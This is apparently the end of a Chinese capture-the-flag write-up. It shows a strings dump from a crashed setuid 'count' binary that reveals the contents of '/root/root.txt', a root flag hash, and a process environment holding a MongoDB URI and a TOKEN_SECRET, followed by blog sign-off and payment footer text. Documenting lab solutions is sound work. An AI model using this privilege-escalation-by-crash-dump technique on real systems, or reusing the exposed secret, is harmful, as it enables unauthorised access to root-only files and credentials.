GLIBC_PRIVATE
sse2
x86_64
avx512_1
i586
i686
haswell
xeon_phi
linux-vdso.so.1
tls/x86_64/x86_64/tls/x86_64/
/lib/x86_64-linux-gnu/libc.so.6
%%%%%%%%%%%%%%%%
ory name:
%99s
6km!
6kmh
/root/root.txt
Total characters = 33
Total words = 2
Total lines = 2
x86_64
./count
SHELL=/bin/sh
versioning=[object Object]
unstable_restarts=0
treekill=true
env=[object Object]
filter_env=
namespace=default
restart_time=0
DB_CONNECT=mongodb://127.0.0.1:27017/auth-web
axm_options=[object Object]
vizion_running=false
PWD=/opt
LOGNAME=dasith
PM2_USAGE=CLI
exec_interpreter=node
PM2_HOME=/home/dasith/.pm2
HOME=/home/dasith
NODE_APP_INSTANCE=0
LANG=en_US.UTF-8
LS_COLORS=
pm_id=0
version=1.0.0
pm_uptime=1647239220655
km_link=false
pm_cwd=/home/dasith/local-web
axm_monitor=[object Object]
instance_var=NODE_APP_INSTANCE
pmx=true
unique_id=d785e813-82ea-40d6-8c5b-fbb480388fde
LESSCLOSE=/usr/bin/lesspipe %s %s
vizion=true
username=dasith
LESSOPEN=| /usr/bin/lesspipe %s
watch=false
windowsHide=true
automation=true
axm_actions=
SHLVL=1
TOKEN_SECRET=gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
PM2_INTERACTOR_PROCESSING=true
created_at=1633619800035
merge_logs=true
pm_pid_path=/home/dasith/.pm2/pids/index-0.pid
PATH=/usr/bin:/bin
pm_err_log_path=/home/dasith/.pm2/logs/index-error.log
node_version=10.19.0
kill_retry_time=100
autorestart=true
axm_dynamic=[object Object]
node_args=
exec_mode=fork_mode
pm_exec_path=/home/dasith/local-web/index.js
OLDPWD=/home/dasith
status=launching
name=index
pm_out_log_path=/home/dasith/.pm2/logs/index-out.log
_=./count
./count
bemX
__vdso_gettimeofday
__vdso_time
__vdso_clock_gettime
__vdso_clock_getres
__vdso_getcpu
linux-vdso.so.1
LINUX_2.6
Linux
Linux
AUATS
A\A]]
[A\M
A]]I
[A\]
[A\]
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0
.shstrtab
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_d
.dynamic
.note
.eh_frame_hdr
.eh_frame
.text
.altinstructions
.altinstr_replacement
.comment🦾诺曼底登录:root权限flag
🪵 从面的信息中,发现
oot/root.txt
5fa8441d1d205afd5bcc44d56c96c8b4📽剧 终
🍀 acesec 🍀
🎴🎴🎴🎴🎴🂢 🂡🎴🎴🎴🎴🎴🎴
一天是祭酒人 一辈子都是
无风祭酒@acesec
只做你在CyberWorld的专属笔记侠
我是我的人民的公仆
同学金手指3连!Triple kill!
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)